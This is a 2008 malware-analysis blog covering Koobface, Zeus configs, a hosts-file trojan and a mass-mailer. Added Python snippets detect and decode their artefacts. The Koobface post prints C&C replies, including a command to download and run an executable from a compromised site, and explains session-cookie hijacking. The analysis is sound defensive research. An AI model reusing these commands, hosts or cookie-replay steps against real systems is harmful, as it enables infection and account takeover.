Wednesday, December 17, 2008

How to Defeat Koobface


As published in the previous blog post, analysis of the current version of Koobface uncovered a very interesting part of it: its "ability" to solve the CAPTCHA protection at the Facebook web site. To put it simply, if Koobface were unable to solve Facebook's CAPTCHA, it would be unable to replicate, because in order to submit a new message one needs to solve the CAPTCHA image first.

Every time Koobface runs into CAPTCHA protection at Facebook, it transfers that image to its command-and-control server. From there, the image is relayed to an army of CAPTCHA solvers who work day and night, ready to pick up a new image from their profile, solve it, submit an answer, and get paid something like 0.5 cent per answer.

Is it financially sustainable?

Think about it this way: according to the World Bank, at least 80% of humanity lives on less than $10 a day. At the same time, web resources like this one give their users an opportunity to make that kind of money ($9) in three hours by solving CAPTCHA images relayed to them. Don't you think the potential army of CAPTCHA solvers has every reason to grow?

Detailed analysis of the traffic between Koobface and its command-and-control server made it possible to tap into its communication channel and inject various CAPTCHA images into it, in order to assess response time and accuracy. The results are astonishing: the remote site solved them all.

But here is a twist: uploading a large number of random CAPTCHA images into its communication channel loads its processing capacity, potentially up to the point of denial of service. And if not that far, then at least it could harm its business model, considering that the cost of solving all those injected images would eventually be paid by the Koobface gang.

The tapping mechanism is best illustrated with the following scheme:



A tool was built specifically to upload CAPTCHA images to the Koobface C&C server and receive the responses. It is available for download here (the ZIP file contains a few test images to upload).

The tool opens up an interesting "dialog" with the back-end operators, a dialog that yields some interesting discoveries.

At first, the response clearly looks like it was produced by automation:



As seen in this example, the automation tried to OCR the image (which contains a very specific Russian word); it's very unlikely that a human would have provided such an answer.

Submitting images with provocative phrases had no luck either: the remote server solves them vigorously, as if it were a bot, or maybe a smart operator instructed to reply as if he or she were a bot:



But given that presumably no automation can handle really complex images, images that are difficult even for humans to solve, let's use the tool to submit more complex ones. Here are the results:



As seen in the picture, all of Facebook's CAPTCHAs were solved pretty well.

But here are a couple of bloopers – these images were resubmitted because the original answers were totally wrong:



Let’s see how it withstands Google’s CAPTCHAs. Here is another blooper revealed:



Wrong answers like "edtgted rghf", "edrfb dfbn", "dfgd dfg", and "asdf df" mean it was not automation. Otherwise, it would have tried to solve the images at least partially, or maybe provided nonsense for the noise detected in the picture, or any other answer suggesting it was a bot. At the very least, the wrong answers would have been consistent across several attempts.

These wrong answers simply mean someone was hitting the keyboard (check the location of these keys), giving those pictures up as puzzles too complex and requiring too much time and attention, in order to proceed to the easier ones.

These results suggest that the back-end CAPTCHA server has a queue of CAPTCHA images to solve, and in front of that queue there must be an automation that first tries to solve CAPTCHAs automatically, using optical character recognition (OCR) techniques. If the automation fails, it passes the image down into the queue to be further distributed and picked up by an operator to be processed manually. There is no obvious way to counter such relaying, as it destroys the very meaning of CAPTCHA: to distinguish a bot from a human. Once the images are eventually processed by humans, the only remaining value of CAPTCHA protection is to make the solving process as expensive as 0.5 cent per image.

The question is: is it expensive enough to be justified at all? Probably it's expensive enough for the kids who build malware out of curiosity or self-determination (compare it with a trivial latch on your window). But it's nothing for those who build malware for profit (the case with Koobface), as more than likely they can afford 0.5 cent per image.

Taking the C&C down? Maybe, but it will most likely pop up in a different place the very next day.

A different way of destroying it is by poisoning its traffic with fake CAPTCHAs that look exactly like the ones passed by a valid Koobface worm. In this case, the Koobface authors will be paying for every fake CAPTCHA solved, the ones generated in the lab, not the real ones from the wild.

Destroying it financially could be a better option in the end.

Friday, December 12, 2008

Zeus Config Decryptor


The banking trojan Zbot (aka WSNPOEM/Zeus/PRG) is still circulating "in-the-wild" in various modifications.

If you are tracking Zbot submissions at the ThreatExpert web site, you might find the following tool useful: it decrypts the contents of the configuration files downloaded by this trojan: DecodeZeusConfig.zip.

The decrypted config file will normally contain the URLs of additional components it downloads, along with the URLs of the online banking services it attacks and the bogus HTML fields it attempts to inject into online banking login forms.

For example, analysis of the Zeus config file contents over the last week reveals the targeted URLs of the following online financial services:

  • Alfa Bank (Russia)

  • Ameriprise Financial Services (US)

  • Banca March (Spain)

  • Bancaja (Spain)

  • Banco Pastor (Spain)

  • Banco Popular (Spain)

  • Banco Santander, S.A. (Spain)

  • BANESNET S.A. (Spain)

  • Banesto (Spain)

  • Bank of America (US)

  • Barclays Bank (UK)

  • Barclays Bank, S.A. (Spain)

  • Cahoot/Abbey National (UK)

  • Caixa Tarragona (Spain)

  • Caixanova (Spain)

  • Caja Espana (Spain)

  • Caja Extremadura (Spain)

  • Caja Madrid (Spain)

  • Caja Madrid Empresas (Spain)

  • Caja Rural (Spain)

  • Caja Segovia (Spain)

  • Cajamurcia (Spain)

  • Cajasol (Spain)

  • CajaSur (Spain)

  • Citibank (US)

  • Citibank Deutschland Gruppe (Germany)

  • Citizens Bank (US)

  • Clydesdale Bank (UK)

  • comdirect bank AG (Germany)

  • Dresdner Bank (Germany)

  • e-gold (US)

  • ePassporte (Netherlands)

  • E-port.Ru (Russia)

  • Fibanc-Mediolanum (Spain)

  • FIDUCIA IT AG (Germany)

  • Fifth Third Bank (US)

  • Halifax/Bank of Scotland (UK)

  • HSBC Bank (UK)

  • JPMorgan Chase & Co. (US)

  • KeyCorp (US)

  • Kutxa, Caja Gipuzkoa San Sebastian (Spain)

  • La Caja de Canarias (Spain)

  • Lloyds TSB (UK)

  • MDM Bank (Russia)

  • MoneyMail.Ru (Russia)

  • National City Bank (US)

  • norisbank GmbH (Germany)

  • PayPal, Inc. (US)

  • RBK Money (Russia)

  • SunTrust Bank (US)

  • TD Group Financial Services (Canada)

  • U.S. Bank (US)

  • Unicaja (Spain)

  • Volksbank Rhein-Wupper eG (Germany)

  • VR-NetWorld eBanking (Germany)

  • Wachovia Securities (US)

  • Washington Mutual, Inc. (US)

  • Wells Fargo Bank (US)

  • Westpac Banking Corporation (Australia)

  • Yorkshire Bank (UK)

Thursday, December 11, 2008

Intervalhehehe


According to multiple forum posts, a number of people seem to be infected with a mysterious virus that pops up every 10 minutes or so and displays the message "Intervalhehehe".

This threat is most likely distributed as a cracked version of the popular software WinRAR. Its file is a WinRAR self-extractor (report here) that unpacks and runs the WinRAR installer itself, plus a file named explore.exe, which is a trojan horse.


The trojan modifies the hosts file to redirect users from google.com, yahoo.com and other legitimate sites to websites hosted at 61.157.217.210, 123.251.143.110, and 123.16.197.121 that are used to distribute rogue antivirus and antispyware solutions:


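Hosts-file redirection of this kind is easy to check for on a suspect machine. The following is an added example written for this page (not code from the post or from the trojan): it flags entries that map a watched domain to any IP other than loopback or 0.0.0.0, so that ordinary ad-blocking entries are not reported. The sample hosts file is constructed, using the three IPs named above; the list of watched domains is an assumption based on the two names the post mentions.

```python
"""Flag hosts-file entries that redirect well-known domains to remote IPs,
the technique the Intervalhehehe trojan uses to push rogue AV sites.
Added example for this page, not code from the post or from the trojan."""
import ipaddress
from typing import List, Tuple

# Domains the post says the trojan redirects; extend as needed (assumption)
WATCHED = {"google.com", "yahoo.com"}

# Constructed sample, modelled on the post's description (line numbers matter
# for the report, so the file is built line by line)
SAMPLE_HOSTS = "\n".join([
    "# constructed sample hosts file",             # line 1
    "127.0.0.1       localhost",                   # line 2: benign
    "61.157.217.210  google.com www.google.com",   # line 3: redirect
    "123.251.143.110 yahoo.com",                   # line 4: redirect
    "123.16.197.121  www.yahoo.com   # redirect",  # line 5: redirect, with comment
    "0.0.0.0         ads.example.net",             # line 6: blocking, not redirection
])


def _is_local(ip: str) -> bool:
    """True for 127.x / ::1 / 0.0.0.0, which block rather than redirect."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False          # not an IP at all; let the caller report it
    return addr.is_loopback or addr.is_unspecified


def _is_watched(name: str) -> bool:
    return name in WATCHED or any(name.endswith("." + w) for w in WATCHED)


def suspicious_hosts_entries(text: str) -> List[Tuple[str, str, int]]:
    """Return (ip, hostname, line_no) for every watched name that a hosts
    file maps to a non-local address. Comments after '#' are ignored."""
    hits = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        if _is_local(ip):
            continue
        for name in names:
            name = name.lower().rstrip(".")
            if _is_watched(name):
                hits.append((ip, name, line_no))
    return hits


if __name__ == "__main__":
    for ip, name, no in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"line {no}: {name} -> {ip}")
```

On a live Windows host the file to feed in is %SystemRoot%\System32\drivers\etc\hosts; the same function works unchanged on /etc/hosts.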
This trojan is a Visual Basic program built on a Chinese system.

In some way (mostly in its annoyance, of course) it is reminiscent of the old DOS-era virus "Skaji Bebe - Fig Tebe".

Tuesday, December 9, 2008

Koobface Leaves Victims the Black Spot


The Koobface worm has already been described enough, but a few details about its functionality may still be interesting to the reader. This post is an attempt to crack it to the bottom.


TECHNICAL SUMMARY

Koobface starts by checking whether its own file name is %windows%\bolivar[number].exe, where [number] is a decimal number that depends on the build of the worm.

If its file name is not %windows%\bolivar[number].exe, it copies itself under that name, runs that file, drops a temporary batch file (e.g. c:\653ad216543.bat) with the commands to delete its own executable (it can't delete itself while it's running), and quits.

When it runs as %windows%\bolivar[number].exe, it creates the mutex object "4334dfgdfgdf5" in order to make sure that only one instance of Koobface is running on the system.

It then retrieves the handle of the foreground window (the window the user is currently working with) and checks whether that window is Internet Explorer. If so, it creates an object that is an invisible instance of Internet Explorer and uses that object to navigate the Facebook site and parse its contents.

The worm drops and runs the file c:\1.reg in order to create the values:

"CLSID"="{25336920-03F9-11cf-8FD0-00AA00686F13}"
"Extension"=".xml"
"Encoding"=hex:08,00,00,00

in the registry key:

HKEY_CLASSES_ROOT\Mime\Database\Content Type\application/xhtml+xml

These registry modifications will force Internet Explorer to display application/xhtml+xml MIME type pages without a download prompt.

Koobface retrieves the default system directory for storing cookies by querying the "Cookies" value in the registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Next, it enumerates all cookies looking for the ones created by facebook.com, myspace.com, and bebo.com websites.

Koobface then makes a DNS query to find out what IP address corresponds to the name y171108.com. The domain name differs between variants, but its format appears to be constant: [letter][date].com, e.g. a22092008.com, f071108.com, z13092008.com.

The name server replies to the DNS request with the IP 58.241.255.37:



This IP address is the command and control (C&C) server for Koobface: it accepts the data Koobface collects on a compromised host and replies with instructions on what Koobface should do.
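The [letter][date].com naming pattern is a usable network indicator. Below is an added example written for this page (not code from the post or from the worm) that flags such names in DNS query logs, accepting the digits only when they form a real calendar date; the two date layouts it recognises, DDMMYYYY and DDMMYY, are inferred from the four samples quoted above, and the log line format and the sample log are constructed.

```python
"""Detect Koobface-style C&C names: one letter, a date, and .com
(e.g. a22092008.com, f071108.com). Added example for this page, not
code from the post; the date layouts are inferred from its samples."""
import re
from datetime import date, datetime
from typing import List, Optional, Tuple

# One ASCII letter, then 6 or 8 digits, then .com (case-insensitive: assumption)
_PATTERN = re.compile(r"^([a-z])(\d{6}|\d{8})\.com$", re.IGNORECASE)

# Constructed DNS log: "<timestamp> <client> QUERY <name>" (format is an assumption)
SAMPLE_LOG = [
    "2008-12-09T10:01:02 10.0.0.5 QUERY y171108.com",
    "2008-12-09T10:01:03 10.0.0.5 QUERY www.facebook.com",
    "2008-12-09T10:02:10 10.0.0.7 QUERY a22092008.com",
    "2008-12-09T10:02:11 10.0.0.7 QUERY b99999999.com",   # 8 digits, not a date
    "2008-12-09T10:03:00 10.0.0.9 QUERY x12345.com",      # wrong digit count
]


def koobface_domain_date(domain: str) -> Optional[date]:
    """Return the date encoded in a matching domain, or None.

    The digits must parse as DDMMYYYY (8 digits) or DDMMYY (6 digits);
    requiring a valid date removes most random letter+digits domains."""
    m = _PATTERN.match(domain.strip().rstrip(".").lower())
    if not m:
        return None
    digits = m.group(2)
    fmt = "%d%m%Y" if len(digits) == 8 else "%d%m%y"
    try:
        return datetime.strptime(digits, fmt).date()
    except ValueError:
        return None


def scan_dns_log(lines) -> List[Tuple[str, date]]:
    """Return (name, encoded_date) for each queried name that matches."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[2] != "QUERY":
            continue
        found = koobface_domain_date(parts[3])
        if found is not None:
            hits.append((parts[3].lower(), found))
    return hits


if __name__ == "__main__":
    for name, when in scan_dns_log(SAMPLE_LOG):
        print(f"{name}: date in name = {when.isoformat()}")
```

The encoded date is worth keeping in the alert: in the post's samples it is close to the build date of the variant, so it helps tell a fresh campaign from an old one.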

The collected data is delivered by Koobface in a POST request submitted to the /fb/first.php resource of the C&C server. The POST string is assembled from parameters like these:

f=0&a=13441600&v=28&c=0&s=fb&l=&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0


For example, the "ck" parameter is equal to "0" if Koobface could not find a facebook.com cookie, or "1" if the cookie was found.


BACKDOOR COMMANDS

The C&C returns instructions that may depend on the data Koobface delivers to the server; these can be considered backdoor commands, which also makes Koobface a backdoor trojan.

Some of the commands that Koobface can be instructed to perform are listed below:

  • FBTARGETPERPOST

  • TINYURL

  • SHARELINK

  • MPOST

  • INVITE

  • PARAMS

  • SWFMODE

  • UPDATE

  • RESET

  • WAIT

  • START

  • STARTIMG

  • DOMAIN_B

  • TITLE_B

  • TEXT_B

  • LINKTEXT_B

  • DOMAIN_M

  • TITLE_M

  • TEXT_M

  • LINKTEXT_M

  • LINK_M

  • DOMAIN_C

  • TEXT_C

  • LINKTEXT_C

  • STARTONCEIMG

  • EXIT

Commands that require parameters have them appended, delimited with the "|" character. For example, the C&C may return these commands:

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
RESET
FBTARGETPERPOST|20
#BLACKLABEL

The first command is START; Koobface performs it this way:

  • it will create a temporary file c:\tmark25[random_number].dat

  • it will then download an executable file from the specified URL saving it as the temporary file

  • it will then copy that file as %temp%\tt_[random_number].exe, then run it


The aforementioned executable will be downloaded either from www.teamtga.com or from www.gameland.ro - according to the parameter returned at the time of this writing. A couple of days ago this was www.aibcvienna.org. A few hours from now it could be a different URL.

The C&C must have an updatable database of compromised web servers from which the Koobface client will be instructed to download and run executables. Once one compromised site is cleaned or taken down, the C&C database will be updated to feed a different URL to its clients.

On RESET command, Koobface will delete the temporary files and re-start its workflow.

On STARTIMG command, it will download a file from the specified URL, save it as c:\tmark25[random_number].dat, decrypt it, parse the decrypted contents, locate URL inside it, then download an executable from that URL, save it as %temp%\tt_[random_number].exe, and finally run that executable.

On UPDATE command, the worm will download an updated build from the specified URL, save it as %temp%\tt_[random_number].exe, run it and quit.

On EXIT, it will simply quit.

Other commands may specify additional global parameters or modes.
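To make the beacon and reply formats above concrete, here is a small decoder for both. It is an added example written for this page, not code from the post or from the worm. It assumes the beacon is ordinary application/x-www-form-urlencoded text and the reply is one command per line with "|" separating the parameter, exactly as the samples show; the only beacon field whose meaning it asserts is "ck", which the post documents, and the commands it treats as "download and run" are the four the post describes that way. The sample beacon and reply are constructed from the values quoted above.

```python
"""Decode the Koobface beacon (POST to /fb/first.php) and the line-based
C&C reply. Added example for this page, not the worm's code; field meanings
are taken only as far as the post states them."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qsl

# Command names listed in the post; anything else is reported as unknown
KNOWN_COMMANDS = {
    "FBTARGETPERPOST", "TINYURL", "SHARELINK", "MPOST", "INVITE", "PARAMS",
    "SWFMODE", "UPDATE", "RESET", "WAIT", "START", "STARTIMG", "DOMAIN_B",
    "TITLE_B", "TEXT_B", "LINKTEXT_B", "DOMAIN_M", "TITLE_M", "TEXT_M",
    "LINKTEXT_M", "LINK_M", "DOMAIN_C", "TEXT_C", "LINKTEXT_C",
    "STARTONCEIMG", "EXIT",
}
# Commands whose parameter is a URL the client downloads and executes (per the post)
PAYLOAD_COMMANDS = {"START", "STARTIMG", "STARTONCEIMG", "UPDATE"}

# Constructed samples, assembled from the values quoted in the post
SAMPLE_BEACON = "f=0&a=13441600&v=28&c=0&s=fb&l=&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0"
SAMPLE_REPLY = (
    "START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe\n"
    "RESET\n"
    "FBTARGETPERPOST|20\n"
    "#BLACKLABEL\n"
)


@dataclass
class Command:
    name: str
    arg: Optional[str]   # None when the line had no "|" at all
    known: bool


@dataclass
class Reply:
    commands: List[Command] = field(default_factory=list)
    tokens: List[str] = field(default_factory=list)        # "#..." lines such as #BLACKLABEL
    payload_urls: List[str] = field(default_factory=list)  # what the bot would fetch and run


def parse_beacon(body: str) -> Dict[str, str]:
    """Split the form-encoded beacon; keep_blank_values keeps 'l=' visible."""
    return dict(parse_qsl(body, keep_blank_values=True))


def has_facebook_cookie(beacon: Dict[str, str]) -> bool:
    """The post documents ck=1 as 'facebook.com cookie found'."""
    return beacon.get("ck") == "1"


def parse_reply(text: str) -> Reply:
    """One command per line; an optional parameter follows the first '|'."""
    reply = Reply()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            reply.tokens.append(line)
            continue
        name, sep, arg = line.partition("|")
        name = name.upper()
        cmd = Command(name, arg if sep else None, name in KNOWN_COMMANDS)
        reply.commands.append(cmd)
        if name in PAYLOAD_COMMANDS and cmd.arg:
            reply.payload_urls.append(cmd.arg)
    return reply


if __name__ == "__main__":
    beacon = parse_beacon(SAMPLE_BEACON)
    print("build", beacon["v"], "facebook cookie:", has_facebook_cookie(beacon))
    for cmd in parse_reply(SAMPLE_REPLY).commands:
        print(cmd.name, cmd.arg, "known" if cmd.known else "UNKNOWN")
```

In a sandbox, feeding every captured reply through parse_reply and collecting payload_urls gives the rotating list of download sites the post describes, which is the part of the traffic worth blocking first.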


REPLICATION

Before it continues, Koobface makes a final query to its C&C server's resource achcheck.php.

If the server responds ACH_OK, the worm goes ahead.

The user-agent string that identifies the client browser is set by Koobface to:
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.3


The user-agent language tag, that indicates the language for which the client had been localized, is "ru": Russian.

This explains the #BLACKLABEL token returned by the C&C server: it is the result of translating the term "The Black Spot" (from the novel Treasure Island by Robert Louis Stevenson) into Russian and back into English.

Once the victim is "given the Black Spot", Koobface locates the cookie left by facebook.com in the cookie cache, reads it, and uses its contents to connect to the Facebook website.

For example, if the cookie's contents start with:
datr
1228869768-5ed159061fd5727f027e6c6678531c19ef53163bfe7ebcbb0203b
facebook.com/
9216
832238592
...


then the GET request submitted by Koobface will look as shown below (check the "datr" value; it is taken from the cookie):



This allows Koobface to connect to the Facebook account using the current user's login session. Thus, it does not need to know the user's login credentials. As long as the user stays logged in to the Facebook account, the worm freely accesses it as if it were the user.
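The cookie excerpt above is enough to show why no credentials are needed. The following added example (written for this page, not code from the post or from the worm) parses that text layout and rebuilds the Cookie header a client would send for a given host and path. The record layout it assumes, name, value, domain/path, flags, two expiry words, two creation words and a "*" separator, is inferred from the excerpt; the trailing numbers of the first record and the whole second record are constructed.

```python
"""Parse the text cookie layout shown above and rebuild the Cookie header.
Added example for this page, not the worm's code. Record layout (assumed
from the excerpt): name, value, domain/path, flags, 2 expiry words,
2 creation words, then a '*' line."""
from typing import Dict, List

SAMPLE_COOKIE_FILE = "\n".join([
    "datr",
    "1228869768-5ed159061fd5727f027e6c6678531c19ef53163bfe7ebcbb0203b",
    "facebook.com/",
    "9216",
    "832238592",            # values from here on are constructed filler
    "30031213",
    "832238592",
    "30031213",
    "*",
    "pref",                 # second record: constructed, different site and path
    "en",
    "example.org/settings",
    "1024",
    "0", "0", "0", "0",
    "*",
])


def parse_cookie_text(text: str) -> List[Dict[str, str]]:
    """Split on '*' separators and extract name, value, domain, path, flags."""
    records: List[Dict[str, str]] = []
    current: List[str] = []
    for line in text.splitlines():
        if line.strip() != "*":
            current.append(line)
            continue
        if len(current) >= 3:                       # need at least name/value/domain
            domain, _, path = current[2].partition("/")
            records.append({
                "name": current[0],
                "value": current[1],
                "domain": domain.lower(),
                "path": "/" + path,
                "flags": current[3] if len(current) > 3 else "",
            })
        current = []
    return records


def _domain_matches(cookie_domain: str, host: str) -> bool:
    """facebook.com covers www.facebook.com but not notfacebook.com."""
    host = host.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def cookie_header_for(records: List[Dict[str, str]], host: str, path: str = "/") -> str:
    """Build 'name=value; name2=value2' for cookies scoped to host and path.

    Nothing here is a password: whoever holds this string holds the session,
    which is exactly what lets the worm act as the logged-in user."""
    pairs = [
        f"{r['name']}={r['value']}"
        for r in records
        if _domain_matches(r["domain"], host) and path.startswith(r["path"])
    ]
    return "; ".join(pairs)


if __name__ == "__main__":
    recs = parse_cookie_text(SAMPLE_COOKIE_FILE)
    print("Cookie:", cookie_header_for(recs, "www.facebook.com"))
```

The defensive lesson is the mirror image: a session cookie that any local process can read from the profile directory is a bearer token, and logging out (which invalidates it server-side) is the only thing on the user's side that stops replay.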

Once connected, the worm opens up several Facebook resources such as home.php, profile.php, group.php. It navigates to the page http://www.facebook.com/friends/?view=everyone in order to obtain the list of the user's friends.

If it locates a friend, it submits a POST request to the C&C server's resource /fb/gen.php. The POST request contains details similar to the ones below:

f=0&a=13441600&v=28&c=0&s=fb&l=&hav=&hname=[encrypted_string]

The C&C server responds with the following parameters:

TITLE_M|Cool nice video with you.
TEXT_M|LOL
LINK_M|http://geocities.com/carlosbecker54/?4bchce6c9a=1851a448d70904485af377d941bca0f4


These parameters are a template for a new message that Koobface should send to the contacts. It then navigates to the page /inbox/?compose within the Facebook website, composes a new message, and submits it in the user's name:



Before the message is dispatched, Facebook returns a CAPTCHA challenge to solve. This security measure is implemented to protect users from threats like Koobface.

In the real test, Facebook.com asked Koobface to solve a CAPTCHA image reading "suffer accorn"; this image was too noisy for image recognition algorithms to solve successfully. But Koobface does not attempt to solve it by itself. It submits the image to its C&C server, which replies with the correct answer in about 34 seconds. Once the answer is received, Koobface submits the message via the compromised Facebook account, including the correct CAPTCHA answer:




PUTTING IT TO A REAL TEST

In order to test Koobface replication in action, two fake accounts were created: "Eno Koob Acef" and "Owt Koob Acef" ("Face Book One" and "Face Book Two" reversed). Both accounts were declared friends of each other.

If the computer logged on to the second account is compromised with Koobface, the worm will use its login session, locate "Eno Koob Acef" as a friend, and send it a message.

The image below shows the inbox of the first account ("Eno Koob Acef") - it contains a new message from the 2nd account ("Owt Koob Acef") with the subject "Cool nice video with you."



When the user clicks the new message link, Facebook.com will open that message:



The message contains a URL that points to a private page hosted at the geocities.com web site. When that link is clicked, the browser redirects the message recipient to the following page:



The page has the header "Secret video by [infected_user_name] - Flash Player Installation". It even has fake testimonials. The page suggests installing a newer version of Flash Player, which of course is not Flash Player. It's a file called flash_update.exe, and it's a new copy of Koobface. If the Facebook user runs it thinking it's a Flash Player update, the worm replicates to this user's friends in the same manner as before, and so on, and so on.


CONCLUSION

At one point of its execution, Koobface submitted GET request to facebook.com:
/campaign/impression.php?campaign_id=[long_number]

The purpose of this request is not quite clear. It might potentially be related to some advertising program within Facebook (e.g. similar to Google AdSense), but this is a guess...

Nevertheless, if it's about the money generated by Koobface clicking ads that Facebook places within other people's profiles, then its business model becomes more evident. It may even include manual labor in breaking the CAPTCHAs (it's not free); at least that would explain the 34-second inter-server delay in solving it.

Monday, December 8, 2008

Escort Agency Serves Naughty Trojan


The ThreatFire team has busted another "in-the-wild" ZBot trojan.

The interesting detail this time is that the trojan is currently hosted on the server with the IP 92.48.71.14; this is the web server of "London Escorts & Escort Agencies", and its domain name is escortcitylondon.com.

When run, the trojan downloads an encrypted configuration file from 193.27.246.190. The config file instructs the bot to update itself right from the escort site mentioned above.

The trojan attempts to deactivate a number of AV products and firewalls by deleting their registry keys, terminating the processes and modifying the hosts file.

ZBot attempts to steal the contents of online banking forms of the following banks:

  • Bank of America

  • CheBanca!

  • Banca Mediolanum


The targeted banking sites can be seen in its memory contents:




Full ThreatExpert report is available here.

Wednesday, December 3, 2008

Beware Christmas Promotions From Coca Cola

A new mass-mailing worm is making its rounds by promoting a Hallmark e-Card, McDonald’s Coupon, or Coca Cola Christmas Promotion.

Full worm description (manual analysis) is provided here.

Automated threat analysis generated this write-up.

ThreatExpert automation tricked this threat with several intentionally planted fake email contacts (such as Rusty Carr, Easton West, Justin Case and others). As soon as this threat picked up one of those contacts and attempted to send an email to that person via ThreatExpert's emulated network services (with no traffic ever leaving the sandbox), it was immediately classified as a mass-mailer.